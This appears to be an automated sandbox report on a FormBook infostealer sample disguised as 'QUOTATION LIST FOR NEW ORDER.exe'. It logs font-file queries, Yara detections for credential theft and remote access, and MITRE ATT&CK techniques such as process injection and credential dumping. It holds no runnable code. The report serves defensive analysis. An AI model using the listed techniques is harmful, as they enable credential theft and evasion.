          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
